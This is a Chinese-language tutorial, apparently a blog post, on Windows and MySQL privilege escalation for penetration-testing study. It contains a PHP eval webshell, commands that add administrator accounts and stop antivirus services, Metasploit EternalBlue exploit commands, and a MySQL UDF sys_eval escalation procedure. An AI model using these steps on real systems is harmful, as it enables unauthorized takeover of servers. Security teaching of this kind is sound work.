十二、权限提升

提权基础 服务器配置(apache2为例)
  • 提权本质

    • 提权本质就是提升自己在服务器中的权限,获得更大的权限
  • 提权分类

    • 提权可以分为本地提权和远程提权、
    • 提权也可以分为系统提权和第三方软件提权
  • 权限配置

    • 一般情况下,Web服务会给予一个特定低权限用户维护服务,避免给与过高权限

    • win2003–计算机管理–服务–Apache2.2

    • 新建一个用户net user test test /add

    • 使用test用户登录apache服务

    • 重启服务失败(是因为当前用户没有执行apache的权限)

    • 授权(之后再重新启动成功)

  • 使用菜刀连接测试

    • 使用中国菜刀工具在不同权限下执行net user username password /add 查看不同的结果

      • 打开菜刀

      • 在apache/htdocs目录新建一个1.php文件,写入一下内容

        <?php @eval($_POST['choppper']);?>
        

        作为一个webshell

      • 菜刀–右键–添加连接(查看要连接的IP地址),密码是chopper

      • 连接正常,然后右键打开虚拟终端

      • 输入 net user admin password /add返回错误

      • 回到服务,以本地系统账户登录,重启服务

      • 再次输入net user admin password /add返回命令完成

Windows系统提权基础命令
  • 获取IP地址信息

    • IP地址是计算机在网络中的门牌号,用来寻找计算机的地址。同一台计算机有多个IP地址,可以有外部连接的IP地址,内部IP地址
    • 在提权过程中,如果有外网IP地址,可以直接使用3389端口进行远程桌面连接。如果只有内网IP地址,可以使用LCX等程序进行端口转发进行连接登录
    • Windows系统下使用ipconfig /all查看网卡信息
  • 获取端口信息

    • 端口是计算机与外部连接的一个接口,每一个开放的服务对应一个端口,用来进行连接
    • Windows下可以使用netstat命令获取端口开放状态
      • netstat -an 获取当前主机所有端口的开放情况及网络连接情况
  • 获取服务信息和进程信息

    • Windows系统下很多第三方软件都使用服务启动。如果使用第三方软件漏洞进行提权,必须了解服务方式开启的第三方软件
    • 可以使用net start命令查看系统所开启的所有服务
    • 可以使用net stop 服务名称 来关闭服务,例如杀毒软件等
    • Windows系统下可以使用tasklist /svc 命令获取运行的进程名称、服务和PID
  • 进程结束、用户管理命令

    • 使用taskkill来结束进程,使用taskkill /?可以查看帮助
    • Windows系统访问时需要有对应的用户命和密码
      • 添加用户:
        • net user username password /add
      • 将用户加组:
        • net localgroup administrator username /add
Windows提权辅助工具
  • 辅助工具介绍

    • Windows-Exploit-Suggester此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标上潜在的缺失补丁
    • 工具获取地址
  • 辅助工具的安装

    • 环境:Python2.7、安装xlrd模块

    • 安装xlrd模块

      • python -m pip install xlrd
    • 执行 --update以获取漏洞文件

      • python windows-exploit-sugggester.py --update

      这里会生成一个文件2021-03-14-mssb.xls

  • 辅助工具命令行介绍

    • 使用-h参数获取帮助信息
  • 辅助工具使用过技巧

    • 查看本机补丁与漏洞文件中,可能存在的POC
      • python windows-exploit-suggester.py --audit -i win7.txt -d 2021-03-14-mssb.xls(这里的win7.txt是systeminfo的导出文件)
Windows远程提权(以ms17-010为例)
  • 远程提权

    • 在授权的情况下,针对目标机器进行渗透册俄式,需要对目标进行提权。可以首先扫描系统是否存在可利用漏洞,探测是否可以利用
    • 如果可以直接利用获得最高权限,那么就不需要本地提权,直接远程提权拿到最高权限
  • ms17-010介绍

    • 一个安全类型的补丁,MS17-010更新修复联网Microsoft Windows中的漏洞。如果攻击者向Microsoft服务器消息块1.0(SMBv1)服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行
  • 扫描探测ms17-010漏洞

    • 在metasploit下直接利用ms17-010的漏洞扫描模块进行探测

      • use auxiliary/scanner/smb/smb_ms17_010
      • set rhosts 目标IP地址
      • run
  • 利用ms17-010漏洞提权

    • 在metasploit下集成了ms17-010的漏洞利用模块

      • use exploit/windows/smb/ms17-010_eternalblue
      • set rhosts 目标IP地址
      • set lhost 本地IP地址
      • set lport 本地监听端口
      • run
Windows本地提权(以ms11-046为例)
  • 系统提权目的

    • 一般情况下,系统管理员只会给与Web服务一个权限比较低的用户来运行
    • 目的:利用系统漏洞来提升当前的运行权限,或者说是添加一个高权限用户
  • 系统提权流程

    1. 获取执行cmd命令窗口,使用systeminfo查看当前系统补丁信息
    2. 利用工具对出没有打的补丁
    3. 菜刀连接,打开虚拟终端执行systeminfo
  • ms11_046提权

    • 利用ms11_046提权
      • 上传ms11_046的exp编译后的exe文件
    • 菜刀进入目录,直接执行ms11_046.exe
      • 执行后会添加一个比较高权限的用户
  • 远程桌面连接

    • 执行远程桌面客户端连接服务端
    • win + R 输入mstsc进入远程桌面连接程序
Mysql UDF提权
  • udf介绍

    • UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段

    • 提权过程中,经常使用mysql的udf.dll进行提权。提权之前,要上传udf.dll到指定的目录。

    • 使用select @@plugin_dir;或show variables like ‘plugin%’;查看具体目录

    • 修改目录方式:

      1. mysqld.exe --plugin-dir=具体目录
      2. musqld.exe --defaults-file=具体目录
      3. mysql.ini配置文件 plugin_dir=具体目录
    • 获取当前系统的运行的数据库位数

      • select @@version_compile_os;
  • udf.dll获取

    • sqlmap自带了对应提权使用的udf库。可以直接下载使用,但需要解密

    • kali自带sqlmap,可以获取到kali的网站根目录,然后再通过kali的网站获取

      • 进入这个目录:/usr/share/sqlmap/extra/cloak
      • 执行解密:./cloak.py -d -i /usr/share/sqlmap/data/udf/mysql/windows/32/lib_mysqludf_sys.dll(这个目录需要自己找)
      • 移动重命名文件到/var/www/html/udf.dll
        • mv lib_mysqludf_sys.dll /var/www/html/udf.dll
      • 获取udf.dll
  • 上传udf

    • 将udf.dll文件上传到具体目录下
    • 利用sql注入进行上传select load_file() into dumpfile “具体路径”
    • 直接利用菜刀上传
  • 执行提权命令

    • 创建可执行系统命令的函数:create function sys_eval returns string soname ‘udf.dll’;
    • 执行命令:
      • select * from mysql.func where name = ‘sys_eval’;
      • select sys_eval(‘dir’);
      • select sys_eval(‘net user user1 123 /add’);
      • select sys_eval(‘net localgroup administrators user1 /add’);
    • 删除函数:drop function sys_eval;
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值